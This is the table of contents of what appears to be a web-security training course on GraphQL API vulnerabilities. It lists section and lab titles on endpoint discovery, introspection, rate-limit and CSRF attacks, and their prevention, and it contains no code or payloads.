GraphQL API vulnerabilities

Contents

0 of 29

Finding GraphQL endpoints 0 of 6

Finding GraphQL endpoints Get started

Universal queries

Common endpoint names

Common endpoint names - Continued

Request methods

Initial testing

Exploiting unsanitized arguments 0 of 2

Exploiting unsanitized arguments

Exploiting unsanitized arguments - Continued

Discovering schema information 0 of 9

Discovering schema information

Using introspection

Probing for introspection

Running a full introspection query

Visualizing introspection results

Suggestions

Suggestions - Continued

Lab: Accessing private GraphQL posts APPRENTICE

Lab: Accidental exposure of private GraphQL fields PRACTITIONER

Bypassing GraphQL introspection defenses 0 of 3

Bypassing GraphQL introspection defenses

Bypassing GraphQL introspection defenses - Continued

Lab: Finding a hidden GraphQL endpoint PRACTITIONER

Bypassing rate limiting using aliases 0 of 3

Bypassing rate limiting using aliases

Bypassing rate limiting using aliases - Continued

Lab: Bypassing GraphQL brute force protections PRACTITIONER

GraphQL CSRF 0 of 3

GraphQL CSRF

How do CSRF over GraphQL vulnerabilities arise?

Lab: Performing CSRF exploits over GraphQL PRACTITIONER

Preventing GraphQL attacks 0 of 1

Preventing GraphQL attacks

Preventing GraphQL brute-force attacks 0 of 1

Preventing GraphQL brute force attacks

Preventing CSRF over GraphQL 0 of 1

Preventing CSRF over GraphQL